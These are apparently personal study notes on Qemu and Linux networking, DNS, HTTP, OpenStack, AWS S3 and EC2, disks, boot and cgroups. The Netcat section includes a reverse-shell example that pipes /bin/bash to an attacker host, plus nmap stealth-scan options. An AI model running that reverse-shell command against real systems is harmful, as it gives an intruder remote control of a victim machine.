Qemu

CLI

To run Qemu in terminal we can use -nographic or -display curses.

Qemu images

There two types of images: - raw: faster, static and take the whole allocated space, can be created with dd or fallocate. - qcow: less performant, dynamic copy-on-write and supports snapshoting. Does not play well with Btrfs, COW on COW.

Overlay storage images are a way to create images from other images.
Qemu images can be resized or converted to other formats with qemu-img.

GuestFS tools

We can use guestfish to modify images

qemu-img reference

Qemu networking

VirtualBox VS Qemu Networking

The following are VB Networking modes and how we can implement them in Qemu:

Not Attached: in qemu this is done by specifying -nic none.
NAT: this is the default for VB, and it is the way Qemu user networking(SLIRP) is setup.
- The hypervisor NAT's the traffic from the guest to the outside world.
- By default the host is accessible from the guest in the address 10.0.2.2.
- The guest is not accessible from the host by default. Access can be achieved through Port forwarding.
- -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::2222:22
- In Qemu's usermode networking, a userspace networking stack is loaded in the qemu process. It is a standlone implementation of ip, tcp, udp, dhcp and tftp ...
NAT Networks: This create a network similar to a home router, the services in the network can reach each other and internet, but they can be reached by outer hosts.
- This is done using using Bridges and TAP interfaces.
- We create a bridge with a static IP address and we plug it into the VMs' nics, then we NAT from it. Finally we run dnsmasq on it to act as a DHCP and DNS server.
Bridged networking: This is the same as the previous but more flexible.
- In Qemu the tap device is bridged to a physical network interface so the machines are accessible from the host network.
- device virtio-net,netdev=network0 -netdev tap,id=network0,ifname=tap0,script=no,downscript=no
Internal networking: Same as bridged, but the VMs are not accessible from the host and vice versa.
- This is achieved in Qemu by droping all the traffic to the bridge on the INPUT iptables chain.
- iptables -I FORWARD -m physdev --physdev-is-bridged -j ACCEPT
- We either need to assign static IPs or run a DHCP server in one of the VMs.
Host-only networking: Hybrid between Host-Only and Bridged, since the VMs can't be accessed by the machines in the host's network, but can be accessed by the hist itself.
- In Qemu the bridge is created and assigned an IP, and no traffic destined to it is dropped. But it is not connected to any physical interface.
Generic networking: VDE networks.

More on Qemu networking in the Arch wiki. And more on VB Networking on their manual.

Qemu networking CLI options

Qemu provide two different entities to configure networking for a vm:
1. The frontend: The nic that the guest sees, it can either be a virtualized network card (e1000) or a paravirtualized device (virtio-net)
2. The backend: The interface used by Qemu to exchange network packets with the outside world (other vms, the host internet ...).
There are 3 options to create network entities -nic, -netdev and -net.
-net can either create a frontend or a backend.
- All frontends and backends created using -net are connected to a hub (previously named vlan). This way all of them will recieve each other's packets.
- It can not use vhost acceleration.
- Qemu -net is deprecated in favor of -device + -netdev or -nic for fast and less verbose network configurations.
-netdev can only create backends and needs to be coupled with -device.
- It does not create a shared hub. and every nic is connected to its backend only, which mean packets are not accessible between interfaces.
- We still can connect to hub using -netdev hubport, however the use of a hub is not required anymore for most usecases.
- -device can only be used with plugable NICs. Boards with on-board NICs can't be configured with -device.
-nic can create both frontends and backends at the same time.
- It is easier to use than -netdev and can configure onboard NICs, and does not place a hub between interfaces.

More information here

Networking

Linux Networking

Network interface Management

1. Wired Interfaces

There are two main commands addr (Layer 3) and link (Layer 2). They have a CRUD interface, can check the help using ip <command> help. ip commands replaced ifconfig commands

ip l CRUD:

ip link show
ip link show dev <interface-name>
ip link add [link <dev-name>] name <interface-name> type <link-type> # Add a virtual link
ip link del dev <interface-name>

ip a CRUD:

ip addr show
ip addr show dev <interface-name>
ip addr add dev <interface-name> <ip-address>/<mask>
ip addr del dev <interface-name> <ip-address>/<mask>

2. Wireless Interfaces

iw replaced iwconfig and iwlist. iw dev is used to manage the wireless interfaces, scan for available networks, link to a Network (using SSID) etc ... iw phy manages the hardware device.

iw dev wlan0 link # information about the link 
iw dev wlan0 info # information about the interface
iw dev wlan0 scan
iw dev wlan0 connect <SSID>

3. ARP protocol

ip [-s] neigh is used to display the neighbors list aka arp cache/table (-s to have verbose statistics). ip n offers a CRuS interface to manage the ARP cache

ip n add <ip-addr> lladr <mac-addr> dev <interface-name>
ip n del <ip-addr> dev <interface-name>
ip n show dev <interface-name>
ip n replace <ip-addr> lladr <mac-addr> dev <interface-name> # Replace or ADD a MAC for the IP address

Notes

Difference between link, device and interface Source: In Linux context they all refer to Kernel's netdev but in networking they can mean different things:
- Link: the actual circuit, path, and/or cable between ports.
- Device: either the entire system, or the blob within it that creates the electrical (optical) signal.
- Interface: the logical middleground between the two, often in the context of the OS (eth0, f0/0, etc.)

TCP/IP

1. Routing

Iproute handles routing the ip route command.

ip route add <network-ip-address>/mask via <router-ip-address> dev <interface-name>
ip route del <network-ip-address>/mask via <router-ip-address> dev <interface-name>
ip route default via <default-gateway-ip>
ip route add prohibit <network-ip-address>/mask # blocks route and sends back an ICMP message
ip route add blackhole <network-ip-address>/mask # blocks route silently

2. TCP ports

Iproute replaces netstat with ss

ss -lntp 
# -l: listening sockets, -n: numerical port numbers, and hostnames -t: tcp, p: show processes using the socket

lsof is very useful too! it shows the open files per user, per process.

lsof -i4 # list all IPv4 network
lsof -p <pid> # list by pid
lsof -u <username> # list by user ^ for negation
lsof -i <protocol>:<port> # list by port
lsof <file-path> # process opening a file

3. TCPDump

TCP dump performs packet monitoring and capture on any Network interface (even Bleutooth, loopback ....)

tcpdump -D # list interfaces available for capture
tcpdump -i <interface-name> -c <count> -w <file-path> # capture packets on an interface and save the results to a file

TCPDump Cheatsheet

Option	Description
-D	List interfaces available for capture
-i eth0	Capture packets on an interface or all interfaces (any)
-c	Capture a specified count of packets
-n	Disable hostname resolution
-nn	Disable protocol, port, and hostname resolution
-i any protocol	Capture packets by protocol on all interfaces
-i any host 10.0.2.18	Capture packets by a host on all interfaces
-i any src/dst 10.0.2.10	Capture packets by source or destination address on all interfaces
-A	View packet content in ASCII
-X	View packet content in hex and ASCII
-w file_name.pcap	Save the output of tcpdump to a file
-r file_name.pcap	Read packets from a file

4. Port Scanning with Nmap

Nmap is a port scanner. It supports many scanning modes.

nmap -iL <host-file> # scan all hosts in a file
nmap -sn <hostname> # Ping scan, host discovery
nmap -Pn <hostname> # Skips host discovery, Only scan the ports.
nmap -r <hostname> # Scan consecutively, don't randomize
nmap -F <hostname> # Perform a fast scan, only common ports
nmap -p <port1,...,portn> <hostname> # select ports to scan
nmap -sU/-sP <hostname> # scan UDP or TCP (default) ports only
nmap -sS <hostname> # TCP Syn scan (stealthy), quick and un-intrusive. start TCP handshake and never end it.
nmap -sT <hostname> # TCP connect Scan.

5. Interacting with remote hosts

ping send an ICMP packet to a destination IP. Very useful for troubleshooting and discovery.

Ping Cheatsheet

Option	Description
hostname	Send a stream of ICMP packets to a hostname
10.0.2.10	Send a stream of ICMP packets to an IP address
-c 5 10.0.2.10	Send a specified amount of packets
-s 100 10.0.2.10	Alter the size of the packets
-i 3 10.0.2.10	Change the interval for sending packets
-q 10.0.2.10	Only show the summary information
-w 5 10.0.2.10	Set a timeout of when to stop sending packets
-f 10.0.2.10	Flood ping. Send packets as soon as possible.
-p ff 10.0.2.10	Fill a packet with data. ff fills the packet with ones
-b 10.0.2.10	Send packets to a broadcast address
-t 10 10.0.2.10	Limit the number of network hops
-v 10.0.2.10	Increase verbosity

6. Netcat

Netcat is also very useful in this regard, since it writes and reads data across networks.

nc -l <port> # Listen on specific port
nc -u -l <port> # listen on an UDP port
nc -v -z <ip-address> <port> # Report connection status

# Reverse Shell
nc -lvp 4444 # On Attacker machine open a connection
nc <attacker-hostname> 4444 -e /bin/bash # On the victim machine

# File Transfer
nc -lvp 4444 > text.txt
nc <hostname> 4444 < test.txt

# Send GET Request to a webserver
printf "GET / HTTP/1.0\r\n\r\n" | nc <hostname> <port>

Network Configurations

1. RHEL Based systems (Old)

The config files used to live in /etc/sysconfig/network-scripts

Option	Description
TYPE=Ethernet	The type of network interface device (e.g., Ethernet, Wi-Fi)
BOOTPROTO=none	Specify boot protocol (none, dhcp, bootp)
DEFROUTE=yes	Specify default route for IPv4 traffic (yes, no)
IPV4_DEFROUTE=yes	Specify default route for IPv6 traffic (yes, no)
IPV4_FAILURE_FATAL=no	Disable the device if the configuration fails (yes, no)
IPV6_FAILURE_FATAL=no	Disable the device if the configuration fails (yes, no)
IPV6INIT=yes	Enable or disable IPv6 on the interface (yes, no)
IPV6_AUTOCONF=yes	Enable or disable autoconf configuration (yes, no)
NAME=eth0	Specify a name for the connection
UUID=...	Specify the unique identifier for the device
ONBOOT=yes	Activate interface on boot (yes, no)
HWADDR=00:00:00:00:00:00	Specify the MAC address for the interface
IPADDR=10.0.1.10	Specify the IPv4 address.
PREFIX=24	Specify the network prefix.
NETMASK=255.255.255	Specify the netmask.
GATEWAY=10.0.1.1	Specify the gateway.
DNS1=192.168.123.3	Specify a DNS server.
DNS2=192.168.123.2	Specify another DNS server.
PEERDNS=yes	Modify the /etc/resolv.conf file (yes/no).

2. Debian Based Systems (Old)

All the network interfaces configurations go into /etc/network/interfaces, with an /etc/network/interfaces.d. Interfaces with lines beginning with auto are brought up on system startup.

3. Distro agnostic config files

In addition to the distro related network configuration files, here are the most common remaining ones:

/etc/hosts: Name to IP Address associations
/etc/resolv.conf: DNS resolver configuration
`/etc/sysconfig/network: Global network settings
/etc/nsswitch.conf: The Name Service Switch config file, used to determine Sources from which to obtain name-service information, and their order.
/etc/hostname: holds the machine hostname (can be set/shown using hostname or hostnamectl)
/etc/hosts.deny and /etc/hosts.allow: Allow or block access to certain services from remote clients (Can use ALL to block or allow all). For example to only allow hosts from 10.0.3.* network to connect to our host via SSH we can do the following

# /etc/hosts.deny
sshd : ALL

# /etc/hosts.allow
sshd : 10.0.3.*

4. Network Manager

Network Manager vs ifcfg-* Options

nmcli con mod	ifcfg-* file	Purpose
ipv4.method manual	BOOTPROTO=none	Set a static IPv4 address
ipv4.method auto	BOOTPROTO-dhcp	Automatically set IPv4 address using DHCP
ip4	ipv4.address "192.168.0.10/24"	IPADDR=192.168.0.10 PREFIX=24
gw4	ipv4.gateway 192.168.0.1	GATEWAY=192.168.0.1
ipv4.dns 8.8.8.8	DNS1-8.8.8.8	Specify DNS server
autoconnect yes	ONBOOT=yes	Automatically activate this connection on boot
con-name eth0	NAME=eth0	Specify the name of the connection
ifname eth0	DEVICE-eth0	Specify the interface for the connection
802-3-ethernet.mac-address ADDR	HWADDR=...	Specify the MAC address of the interface for the connection

nmcli commands

Purpose	Command
nmcli dev status	Show the status of all network interfaces
nmcli con show	List all connections
nmcli con show name	List the current settings for the connection name
nmcli con add con-name name ...	Add a new connection named name
nmcli con mod name ...	Modify a connection
nmcli con reload	Reload the network configuration files
nmcli con up name 1 nmcli con down name	Activate or deactivate a connection
nmcli dev dis dev	Deactivate and disconnect the current connection
nmcli con del name	Delete the connection and its configuration file

Network Diagnostics and Troubleshooting

1. Traffic analysis with Traceroute and MTR

Traceroute tracks the route taken by packets from source to destination. The traceroutecommand uses UDP packet by default, but can use ICMP ECHO -I or TCP SYN -T for probing. Tracepath is modern alternative with less fancy options.

traceroute -n -q 2 -I www.google.com # Don't resolve hostname, use ICMP and send only 2 probes per host.

MTR on the other hand use ICMP ECHO by default, but this can be changed using -T (TCP) and -u (UDP). ALso MTR is a TUI and record more statistics.

mtr -r -c 3 -f 4 www.google.com # Generate a report instead of RT interface (3 runs, start as 6th hop).
mtr -run4 -c 3 www.google.com # Only non resolved IPv4 addresses, use UDP for probes.
mtr -w -c 3 www.google.com # Generate a wise report instead (non truncated IP addresses/hostnames)

2. Network logs

Debian Based systems use /var/log/syslog for logging system logs, while RHEL based use /var/log/messages.

Another source for logs is Systemd logs, which are stored in a binary format and can be consulted using the journalctl utility. In Addition to all of that we have dmesg which read messages from the Kernel ring buffer.

Notes

Traceroute and MTR are very useful to troubleshoot and diagnose any network traffic problems.
Changing between UDP, ICMP and TCP probes can be helpful to avoid routers filtering.
The kernel ring buffer is a data structure in the Linux kernel that stores log messages generated by the kernel. It is a cyclic buffer that holds the most recent log messages and can be read through the /proc/kmsg file or by using the dmesg command. The kernel ring buffer provides a quick and efficient way for system administrators to diagnose and troubleshoot problems with the Linux system.

Resources

Deprecated Linux networking commands and their replacements

DNS

DNS Resolution process

DNS resolver look in its DNS cache
DNS resolver breaks iduoad.com to [., com., iduoad.com.]
The DNS resolution start at . which is called root domain. Its ip addresses are already know to the DNS resolver. => returns(address of the authoritative nameserver of .)
DNS resolver queries the root domain nameserver to find the DNS servers to respond with details on com.. => returns(address of the authoritative nameserver of com.)
DNS resolver queries the com. authoritative nameserver to get authoritative nameserver for iduoad.com.
DNS resolver queries the authoritative nameserver for iduoad.com and gets the latter's IP address.

A DNS request using dig utility:

# To visualize the entire process we run the following command
dig +trace iduoad.com

A DNS response looks like the following:

iduoad.com.		1799	IN	CNAME	iduoad.netlify.app.
# REQUEST    TTL(for cache)    IN    Query TYPE    Response

DNS and Layer 4 protocols

Multiplexing/Demultiplexing and UDP in linux

Multiplexing: When a client makes a DNS request, after filling the necessary application payload, it passes the payload to the kernel via sendto system call.
Demultiplexing: When the kernel on server side receives the packet, it checks the port number and queues the packet to the application buffer of the DNS server process which makes a recvfrom system call and reads the packet.
UDP is one of the simplest transport layer protocol and it does only multiplexing and demultiplexing. Another common transport layer protocol TCP does a bunch of other things like reliable communication, flow control and congestion control...

TCP/UDP throughput and Kernel buffer size

If the underlying network is slow, and the UDP layer can't queue packets down to the Network Layer. sendto syscall will hang until the kernel finds some of its buffer freed up. Increasing write memory buffer values using sysctl variables net.core.wmem_max and net.core.wmem_default provides some cushion to the application from the slow network.
Same thing happens in the server side. If the receiver process is slow (slower than the Kernel), the kernel has to drop packets which can't queue due to the buffer being full. Since UDP doesn’t guarantee reliability these dropped packets can cause data loss unless tracked by the application layer. Increasing sysctl variables rmem_default and rmem_max can provide some cushion to slow applications from fast senders.

DNS Resolution in Linux

When we head into a website. The browser first looks if the domain is already stored in its DNS cache.
If the domain name does not exist in the browser's DNS cache, the browser calls the gethostbyname syscall.
Linux looks in /etc/nsswitch.conf to know the order it will follow when trying to resolve the domain name to the ip address.
Let's say the NSS file contains the following entry hosts: files dns.
The OS will look in /etc/hosts file first for match of the domain name.
If none is found in the hosts file, it will use nss-dns plugin to make a DNS request to the DNS resolvers listed in /etc/resolv.conf (in order from top to bottom).

The DNS resolvers are populated by DHCP or statically configured by an administrator.

nsswitch.conf file

The /etc/nsswitch.conf file is used to configure which services are to be used to determine information such as hostnames, password files, and group files.

An example of the /etc/nsswitch.conf

# Name Service Switch configuration file.
# See nsswitch.conf(5) for details.

passwd: files systemd
group: files [SUCCESS=merge] systemd
shadow: files systemd
gshadow: files systemd

publickey: files

hosts: mymachines resolve [!UNAVAIL=return] files myhostname dns
networks: files

protocols: files
services: files
ethers: files
rpc: files

netgroup: files

The syntax is the following:

database_name: (service_specifications...[STATUS=ACTION])

database_name: is the database name we will be looking for.
service_specification: where we'll be looking. Depend on the presence of shared libraries. (e.g files, db, ldap, winbind ...)
STATUS: a resulting status for service_specification if it occurs ACTION is taken.

In the previous example:

for passwd, group, shadow and gshadow the system will look in the files first then it will fallback to systemd.
for group if the lookup in the files succeeds, the processing will continue to systemd and will merge the member list of the already found groups will be merged together.
for hosts it will use mymachines plugin, then resolve. If resolve is available it will return (stop the lookup) otherwise it will continue to files, myhostname and finally dns.
for other services it will use files.

NSS Plugins

There are many NSS (Name Service Switch) plugins that are used to resolve names to ips. Here are some examples:

nss-mymachines: provides hostname resolution for the names of containers running locally that are registered with systemd-machined.service.
nss-myhostname: provides hostname resolution for the locally configured system hostname as returned by gethostname.
nss-resolve: resolves hostnames via the systemd-resolved local network name resolution service. It replaces the nss-dns plug-in module that traditionally resolves hostnames via DNS.

  iduoad.com.		1799	IN	CNAME	iduoad.netlify.app.
  # REQUEST    TTL(for cache)    IN    Query TYPE    Response

Linux DNS utilities: `dig` vs `nslookup`

dig uses the OS resolver libraries. nslookup uses is own internal ones.
Internet Systems Consortium (ISC) has been trying to get people to stop using nslookup.
nslookup was considered deprecated until BIND 9.9.0a3 release.
Source in StackOverflow thread #❔

DNS applications

There many application for DNS for an SRE for example: internal DNS infrastructure, Service Discovery, DNS Load Balancing, Scalling Services (CNAME), CDNs, DNSSEC ...
Some usecases from linkedin SRE course
Cool Networking Excercices

HTTP

HTTP/1.0 vs HTTP/1.1 vs HTTP/2.0

HTTP/1.0 uses a new TCP connection for each request.
HTTP/1.1 can only have one inflight request in an open TCP connection but connections can be reused for multiple requests one after another.
HTTP/2.0 can have multiple inflight requests on the same TCP connection.

  # This will exit after this single request.
  telnet iduoad.com 80
  GET / HTTP/1.0
  HOST:iduoad.com
  USER-AGENT: curl

  # We can reuse the same connection for multiple requests.
  telnet iduoad.com 80
  GET / HTTP/1.1
  HOST:iduoad.com
  USER-AGENT: curl

  GET / HTTP/1.1
  HOST:iduoad.com
  USER-AGENT: curl

Cloud

Openstack

Installation

Kolla Ansible

Kolla ansible inventory consists of 5 groups:

control
compute
network
storage
monitoring

source

Networking

Openstack requires at least 2 network interfaces, in Kolla they are created using:

network_interface: Not used on its own but most other services default to using it.
neutron_external_interface: Required by Neutron and used for flat networking and tagged vlans
Openstack networks are Layer 2.

A network is the central object of the Neutron v2.0 API data model and describes an isolated Layer 2 segment. In a traditional infrastructure, machines are connected to switch ports that are often grouped together into Virtual Local Area Networks (VLANs) identified by unique IDs. Machines in the same network or VLAN can communicate with one another but cannot communicate with other networks in other VLANs without the use of a router.

IP address in openstack

To create public ip address in openstack (floating ips) we use openstack floating ip create docs
To assign a new ip address to a machine we use openstack server add floating ip docs

Create a Test VM

openstack server create --flavor 1 --image cirros  --network <network-id>  test_vm

Networking

Creation

The Neutron workflow (when booting a VM instance)

The user creates a network.
The user creates a subnet and associates it with the network.
The user boots a virtual machine instance and specifies the network.
Nova interfaces with Neutron to create a port on the network.
Neutron assigns a MAC address and IP address to the newly created port using attributes defined by the subnet.
Nova builds the instance's libvirt XML file, which contains local network bridge and MAC address information, and starts the instance.
The instance sends a DHCP request during boot, at which point, the DHCP server responds with the IP address corresponding to the MAC address of the instance

Deletion

The user destroys the virtual machine instance.
Nova interfaces with Neutron to destroy the ports associated with the instances.
Nova deletes local instance data.
The allocated IP and MAC addresses are returned to the pool.

Console

There are three remote console access methods commonly used with OpenStack:

novnc: An in-browser VNC client implemented using HTML5 Canvas and WebSockets
spice: A complete in-browser client solution for interaction with virtualized instances
xvpvnc: A Java client offering console access to an instance

Resources

Ansible performance tunning

AWS

AWS S3

General Overview

Object storage service for scalable, durable data storage.
99.999999999% (11 9's) durability; 99.99% availability for most classes.
Unlimited storage; pay for usage (storage, requests, data transfer).
Global via multi-Region access; integrates with AWS services (EC2, Lambda, etc.).
Data Model:
- Bucket – top-level container (unique name, global namespace)
- Object – file + metadata
- Key – full path to object within a bucket
There is no concept of directory in General-purpose S3.
Objects size is limited at 5GB objects with more than 5GB, must use "multi-part" upload.
Objects can have key-value pairs of Metadata and can have key-value tags (useful for security/lifecycles)

Storage Classes

Class	Use Case	Durability	Availability	Retrieval Time	Minimum Storage Duration	Retrieval Fee
S3 Standard	Frequent access	11 9s	99.99%	Instant	None	No
S3 Intelligent-Tiering	Unknown access patterns	11 9s	99.9–99.99%	Instant	None	No
S3 Standard-IA	Infrequent access	11 9s	99.9%	Instant	30 days	Yes *
S3 One Zone-IA	Non-critical infrequent data	11 9s	99.5%	Instant	30 days	Yes
S3 Glacier Instant Retrieval	Rarely accessed, quick retrieval	11 9s	99.9%	ms	90 days	Yes
S3 Glacier Flexible Retrieval	Archive w/ minutes–hours access	11 9s	99.99%	minutes–hours	90 days	Yes
S3 Glacier Deep Archive	Long-term cold storage	11 9s	99.99%	hours (12h typical)	180 days	Yes

* : Retrieval is priced per GB.

Glacier Retrieval Options

Tier	Flexible Retrieval	Deep Archive
Expedited	1-5 minutes	N/A
Standard	3-5 hours	12 hours
Bulk	5-12 hours	48 hours

Versioning

Lifecycle rule actions

Transition rule actions

(R1) Transition current versions of objects between storage classes.
- Storage class transitions (Target storage class).
- Days after object creation.
(R2) Transition noncurrent versions of objects between storage classes.
- Storage class transitions.
- Days after objects become noncurrent.
- Number of newer versions to retain.

Deletion/Expiration rule actions

(R3) Expire current versions of objects.
- Days after object creation
(R4) Permanently delete noncurrent versions of objects.
- Days after objects become noncurrent
- Number of newer versions to retain - Optional
(R5) Delete expired object delete markers or incomplete multipart uploads.
- Delete expired object delete markers
- Delete incomplete multipart uploads

Object deletion in a versioned bucket.

Delete an object with Show versions off -> Soft Delete -> Delete Marker created and is the current version shadowing all other versions.
Delete an object with Show versions on -> Permanent Delete for the chosen version -> if current is deleted the latest non current becomes current.
No promotion is supported. If an old version is wanted it should be copied over the latest version to create a new one with the content of the old one.
Lifecycle rule actions (R3) creates a delete marker and promotes it as current version.
The Expiration rule (R3) only applies to actual object versions, not delete markers.

Replication

Cross-Region Replication (CRR) vs Same-Region Replication (SRR)

Feature	Details
Prerequisites	Versioning enabled on both source and destination
Replication scope	All objects, prefix, or tags
What's replicated	New objects after enabling, metadata, ACLs, tags
Not replicated	Existing objects (need S3 Batch), lifecycle actions, objects in Glacier/Deep Archive
Delete behavior	Delete markers can be replicated (optional), version deletes not replicated
Replication Time Control (RTC)	99.99% within 15 minutes (SLA)
Batch Replication	Replicate existing objects, failed replications

Two-way replication

Enable bidirectional replication between buckets
Prevents replication loops automatically

Security

Encryption at Rest

Type	Key Management	Performance
SSE-S3	AWS managed (AES-256)	No impact
SSE-KMS	AWS KMS keys	KMS API limits apply
SSE-C	Customer-provided keys	Customer manages keys
Client-side	Encrypt before upload	Customer responsibility

Bucket default encryption: Applied to new objects without specified encryption
Enforce encryption: Use bucket policy to deny unencrypted uploads

Encryption in Transit

SSL/TLS (HTTPS) endpoints available
Enforce with bucket policy: aws:SecureTransport condition

Access Control

Priority order: Explicit DENY → Explicit ALLOW → Implicit DENY

Method	Scope	Use Case
IAM Policies	User/role level	Control who can access S3
Bucket Policies	Bucket level	Cross-account, public access, IP restrictions
ACLs (legacy)	Bucket/object level	Simple permissions (avoid for new implementations)
Access Points	Subset of bucket	Simplify permissions for shared datasets
Presigned URLs	Object level	Temporary access without credentials

Block Public Access (BPA)

Four settings: Block public ACLs, Ignore public ACLs, Block public policies, Restrict public buckets
Applied at account or bucket level
Overrides bucket policies and ACLs

S3 Access Points

Named network endpoints with dedicated policies
Each access point has own DNS name
Supports VPC-only access
Simplifies managing access for shared datasets
Can restrict to specific VPC/VPCE

Event Notifications

Destinations: SNS, SQS, Lambda, EventBridge

Events:

Object created (PUT, POST, COPY, CompleteMultipartUpload)
Object deleted, restored
Replication events
Lifecycle events
Intelligent-Tiering changes

EventBridge advantages:

Advanced filtering (JSON rules)
Multiple destinations
Archive, replay events
18+ AWS service targets

S3 Directory Buckets

New bucket type optimized for high performance
Used with S3 Express One Zone storage class
Single-digit millisecond latency
Up to 100GB/s throughput per bucket
Consistent hashing for predictable performance
Different naming: bucket-name--azid--x-s3

Performance

Multipart Upload

Required for objects > 5GB
Recommended for objects > 100MB
Parts: 1-10,000 parts, 5MB-5GB each (except last)
Benefits: Parallel uploads, pause/resume, start before knowing final size

Transfer Acceleration

Uses CloudFront edge locations
URL: bucket-name.s3-accelerate.amazonaws.com
Up to 50-500% faster for global users
Additional cost per GB
Test speed: AWS provides comparison tool

Performance Baseline

3,500 PUT/COPY/POST/DELETE requests per second per prefix
5,500 GET/HEAD requests per second per prefix
No limit on prefixes per bucket
Spread objects across prefixes for higher throughput

Byte-Range Fetches

Request specific byte ranges of object
Parallelize downloads
Resilient to network failures (retry smaller range)

S3 Select & Glacier Select

Retrieve subset of data using SQL
Filter at S3 side (up to 400% faster, 80% cheaper)
Works with CSV, JSON, Parquet
Supports compression (GZIP, BZIP2)

AWS EC2

EC2 instance types

Instance types names are composed of 4 components

Instance family: The primary purpose of the instance.
Generation: Version number, higher is newer, faster and usually cheaper for the same performance
Additional capabilities: Information about Additional hardware capabilities. Like CPU brand, networking optimization, ...
Service related prefix/suffix: The service owning the instance (e.g. rds, search, cache...)

Common Instance families

Family	Letter	What It's Optimized For	Common Use Cases
General Purpose	T (Burstable)	Low baseline CPU with "burst" capability.	Dev/test servers, blogs, small web apps.
General Purpose	M (Main / Balanced)	A balanced mix of CPU, Memory, and Network.	Most applications, web servers, microservices.
Compute Optimized	C (Compute)	High CPU power relative to memory (RAM).	Batch processing, media transcoding, game servers.
Memory Optimized	R (RAM)	A large amount of Memory relative to CPU.	Databases (RDS), in-memory caches (ElastiCache).
Storage Optimized	I / D (I/O, Dense)	Extremely high-speed local disk I/O.	NoSQL databases, search engines (Elasticsearch).
Accelerated Computing	G / P (Graphics / Parallel)	Hardware accelerators (GPUs).	AI/Machine Learning, 3D rendering.

Common Additional capabilities

Capability Letter	Meaning (Processor or Feature)
`g`	Graviton (AWS's custom ARM processors)
`a`	AMD processors
`i`	Intel processors (often omitted if default)
`d`	Local NVMe Storage (fast "instance store" drives)
`n`	Network Optimized (higher network bandwidth)
`z`	High Frequency (very fast single-core CPU)

Linux

Storage

SSDs

Types of SSDs:

Form Factors:
- 2.5" : looks like an HDD, slower, only supports SATA.
- M.2: They come in few standard lengths (60mm, 80mm, 110mm), they support two interfaces:
  - SATA
  - PCIe (with and without NVMe support)
- Add-in Card (AIC): Bigger than M.2 and operates over PCIe.
- mSATA: looks like M.2, very small
- U.2: Looks like 2.5" but they way faster. They are mainly used in the enterprise (Data centers)

NVME (Non-Volatile Memory Express):

is a super fast way to access SSDs and flash memory (NVM)
NVMe is not an interface and not a form factor (like SATA or PCIe) but a data transfer protocol
SSDs used SATA -> PCIe (lack of standard and features) -> NVMe

Lots of videos at the bottom of the page

PCIe

Each PCIe interface can be configured with 1 lane or multiple lanes x4 (x4, x8, x16 and x32).
Each PCIe Generation doubles the bandwidth
PCIe is backward compatible (The interface and card settle on the lower version)
PCIe cards can be plugged in slots with different number of lanes with the consequence of having less bandwidth or wasted lanes.

Hard disk drive interface

PATA(IDE) - SCSI: Old interfaces
SATA: Personal HDD, successor of PATA
SAS: Entreprise HDD, successor of SCSI
More and More

Disks and Partitions

partitioning formats

There are 2 known partioning formats:

MBR: 2TB is the limit disk size, can only create 4 primary partitions, the last one is set to extended partition in which we can create Logical partitions.
GPT: No disk limit, no limit for partition size. The partition table information is available in multiple locations to guard against corruption. GPT can also write a “protective MBR” which tells MBR-only tools that the disk is being used.

`/dev/sd*` vs `/dev/disks`:

The Linux kernel decides which device gets which name (/dev devices) on each boot. which can lead to to confusion and unwanted behavior.
/dev/disks has many subfolders that points to the partitions using other parameters besides the device name (label, id, uuid ...)

Boot

BIOS

The BIOS in modern PCs initializes and tests the system hardware components (Power-on self-test), and loads a boot loader from a mass storage device which then initializes a kernel. In the era of DOS, the BIOS provided BIOS interrupt calls for the keyboard, display, storage, and other input/output (I/O) devices that standardized an interface to application programs and the operating system. More recent operating systems do not use the BIOS interrupt calls after startup.[6]

Boot Sequence

System switched on, the power-on self-test (POST) is executed.
After POST, BIOS initializes the hardware required for booting (disk, keyboard controllers etc.).
BIOS launches the first 440 bytes (the Master Boot Record bootstrap code area) of the first disk in the BIOS disk order.
The boot loader's first stage in the MBR boot code then launches its second stage code (if any) from either:
- Next disk sectors after the MBR, i.e. the so called post-MBR gap (only on a MBR partition table),
- A partition's or a partitionless disk's volume boot record (VBR),
- For GRUB on a GPT partitioned disk—a GRUB-specific BIOS boot partition (it is used in place of the post-MBR gap that does not exist in GPT).
The actual boot loader is launched.
The boot loader then loads an operating system by either chain-loading or directly loading the operating system kernel.

UEFI

UEFI launches EFI applications, e.g. boot loaders, boot managers, UEFI shell, etc. These applications are usually stored as files in the EFI system partition. Each vendor can store its files in the EFI system partition under the /EFI/vendor_name directory. The applications can be launched by adding a boot entry to the NVRAM or from the UEFI shell.

Boot Sequence

System switched on, the power-on self-test (POST) is executed.
After POST, UEFI initializes the hardware required for booting (disk, keyboard controllers etc.).
Firmware reads the boot entries in the NVRAM to determine which EFI application to launch and from where (e.g. from which disk and partition).
A boot entry could simply be a disk. In this case the firmware looks for an EFI system partition on that disk and tries to find an EFI application in the fallback boot path EFIBOOTBOOTx64.EFI (BOOTIA32.EFI on systems with a IA32 (32-bit) UEFI). This is how UEFI bootable removable media work.
Firmware launches the EFI application.
- This could be a boot loader or the Arch kernel itself using EFISTUB.
- It could be some other EFI application such as the UEFI shell or a boot manager like systemd-boot or rEFInd.
If Secure Boot is enabled, the boot process will verify authenticity of the EFI binary by signature.

Containers

Cgroups

Privileged access to Cgroups

CGroups can be accessed with various tools:

Systemd directives to set limits for services and slices.
Through the cgroup FS.
Through libcgroup binaries like cgcreate, cgexec and cgclassify.
The Rules engine daemon to automatically move certain users/groups/commands to groups (/etc/cgrules.conf and cgconfig.service).
Through other software like LXC.

Unprivileged access to Cgroups

Unprivileged users can divide resources using CGroups v2. memory and pids controllers are supported out of the box. cpu and io require delegation.

To delegate cgroup resources we should add the Delegate systemd property, and reboot

# /etc/systemd/system/user@1000.service.d/delegate.conf
[Service]
Delegate=cpu cpuset io

Experiment running Kubernetes in LXD

Try 1: Kubernetes storage support

Kubernetes filesystem support

The hardest issue with deploying Kubernetes on LXD/LXC containers is storage and filesystem support:

BTRFS

BTRFS does not work well with kubernetes, due to CAdvisor not playing well with BTRFS

ZFS

ZFS does not work as well on LXC and kubernetes, since it does not bad support for nested containers.

k3s/issues/19

One workaround is creating subvolumes for the container runtime and formatting them in Ext4:

using-docker-and-kubernetes-on-zfs-backed-host-systems

Another Workaround is to have a ZSF enabled containerd in the host and make it accessible inside LXC

There are other solution like using docker loopback plugin ...

k3s/issues/66

Containerd and overlay inside LXC

When running containerd inside LXC, due to Systemd being unable to execute modprobe overlay inside the container (module is already loaded in host kernel).

docker/for-linux/issues/475

Containerd is already patched and modprobe errors are ignored.

containerd/containerd/pull/2776

Cgroups v2 support

Containerd (and runC) supports Cgroups v2 already

I enabled it using this

[plugins]
  [plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc]
